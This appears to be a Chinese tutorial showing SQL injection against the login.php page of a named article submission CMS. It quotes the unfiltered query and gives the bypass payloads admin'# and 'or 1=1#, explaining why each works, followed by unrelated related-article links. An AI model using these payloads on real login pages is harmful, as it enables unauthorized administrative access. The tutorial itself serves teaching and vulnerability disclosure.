来到登陆地址,login.php,我们看下这个文件的源码 。
$adminsql = "select * from axphp_admin where adminname='$adminname' and adminpass='$adminpass'";
我们发现没有做任何过滤
我们构造一下sql语句绕过后台登陆
文章插图
成功登陆后台
我们来看一下我们的 admin’# 为什么能绕过后台登陆:
$adminsql = "select * from axphp_admin where adminname='$adminname' and adminpass='$adminpass'";$adminsql = "select * from axphp_admin where adminname='admin'#' and adminpass='$adminpass'";//我们构造的sql语句
‘闭合了前面的‘,#是注释,#后面的sql语句将不会执行,会执行的sql语句:
select * from axphp_admin where adminname='admin'
因为我们的账号确实是admin,所以成功登陆 。
举一反三,假如我们不知道账号也不知道密码怎么构造sql语句绕过后台登陆呢?
这里先要知道一个知识点:or,只要两个条件其中一个为真即为真,举个例子:
1+1=1 or 1+1=2,为真,没毛病~~
我们来构造一下sql语句:
文章插图
我们来看一下我们的 ‘or 1=1#为什么能绕过后台登陆:
(#后面的sql语句将不会执行,会执行的sql语句)
select * from axphp_admin where adminname=''or 1=1
‘ ’ or 1=1为真
【盾灵原创文章投稿系统后台绕过漏洞】所以即使不知道账号密码我们也可以成功登陆
- 人民文学投稿须知,如何向人民文学投稿
- 网友投稿将自家猫咪变成贴图,从第一张开始就让人笑到停不下 世界之最贴图
- Nature发AIGC禁令!投稿中视觉内容使用AI的概不接收
- 短篇小说杂志刊物前十名,关于给短篇小说连载杂志投稿
- 校园活动网站 172校园活动网投稿网址
- 意林连载的玄幻小说,意林小小姐收玄幻武打小说吗,想投稿啊~
- 奥比岛官方网站,如何屏蔽奥比岛?
- 投稿论文格式要求 投稿征文的格式怎么写
- 诗刊投稿地址 如何向《诗刊》投稿
- 通俗小说投稿给杂志